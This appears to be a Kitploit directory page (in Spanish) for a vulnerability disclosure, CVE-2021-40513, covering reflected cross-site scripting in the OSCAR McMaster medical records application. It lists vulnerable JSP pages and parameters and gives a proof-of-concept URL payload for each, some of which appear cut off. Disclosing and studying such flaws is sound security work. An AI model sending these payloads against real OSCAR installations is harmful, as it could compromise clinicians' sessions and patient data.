Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-40513 — CVE-2021-40513 OSCAR McMaster 19.40~1235 Vulnerabilidad de Cross-Site Scripting Reflejado (Reflected XSS). | Kitploit
Herramientas/GitHubGitHub/war4uthor/cve-2021-40513
Análisis de VulnerabilidadesExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAprendizaje y Educación
GitHubwar4uthor/cve-2021-40513

CVE-2021-40513

CVE-2021-40513 OSCAR McMaster 19.40~1235 Vulnerabilidad de Cross-Site Scripting Reflejado (Reflected XSS).

Ver Repositorio
hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-40513 OSCAR McMaster 19.40~1235 Vulnerabilidad de Cross Site Scripting Reflejado

Existe una vulnerabilidad de Cross Site Scripting reflejado en varias páginas de la versión 19.40~1235 de la aplicación OSCAR McMaster que permite la ejecución arbitraria de comandos JavaScript.

[Marcador de posición para CVE mitre]

Páginas JSP vulnerables:

documentReport.jsp - parámetros functionid, function, curUser

addappointment.jsp - parámetros duration, end_time, start_time, day, month, year, provider_no

unLock.jsp - parámetro userName

semographiccontrol.jsp - parámetro keyword

providercontrol.jsp - parámetros provider_no, viewall, view, month, year, day, every_min

CalendarPopup.jsp - parámetros month, year, param, urlfrom

logReport.jsp - parámetros endDate, startDate

SendDemoMessage.do - parámetro demographic_no

ViewConsultation.do - parámetro demographic_no

Ejemplos de payloads vulnerables:

documentReport.jsp - /oscar/dms/documentReport.jsp?function=provider&functionid=999998&curUser=999998daka4%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3Eowtpz

addappointment.jsp - /oscar/appointment/addappointment.jsp?provider_no=999998&bFirstDisp=true&year=2021&month=08&day=27&start_time=08:00&end_time=08%3a14pyqzl'>

unLock.jsp - /oscar/admin/unLock.jsp?userName=192.168.105.149w5q31%3Cscript%3Ealert(document.domain)%3C%2fscript%3Efe9hjvibv0e&submit=Unlock

semographiccontrol.jsp - /oscar/demographic/demographiccontrol.jsp?search_mode=search_name&keyword=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&orderby=last_name%2C+first_name&dboperation=search_titlename&limit1=0&limit2=10&displaymode=Search&ptstatus=active&fromMessenger=false&outofdomain=

providercontrol.jsp - /oscar/provider/providercontrol.jsp?year=%3Cscript%3Ealert(document.domain)%3C/script%3E;&month=8&day=18&view=0&curProvider=null&curProviderName=null&displaymode=day&dboperation=searchappointmentday

CalendarPopup.jsp - /oscar/share/CalendarPopup.jsp?urlfrom=xm4vs">

logReport.jsp - /oscar/admin/logReport.jsp?providerNo=*&content=admin&startDate=2021-08-29b2266"><script>alert(document.domain)<%2fscript>xdzr6digegi&endDate=2021-08-30&submit=Run+Report

SendDemoMessage.do - /oscar/oscarMessenger/SendDemoMessage.do?demographic_no=dllj2%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ej7t05

ViewConsultation.do - /oscar/oscarEncounter/ViewConsultation.do?sendTo=i15ji%3cscript%3ealert(document.domain)%3c%2fscript%3eu5x29&startDate=&endDate=&searchDate=0&currentTeam=&orderby=2%27%20ASC&desc=0&offset=&limit=100&mrpNo=&patientId=&serviceFilter=&consultantFilter=&urgencyFilter=

Descubierto por Jack McBride, agosto de 2021

Descargar herramienta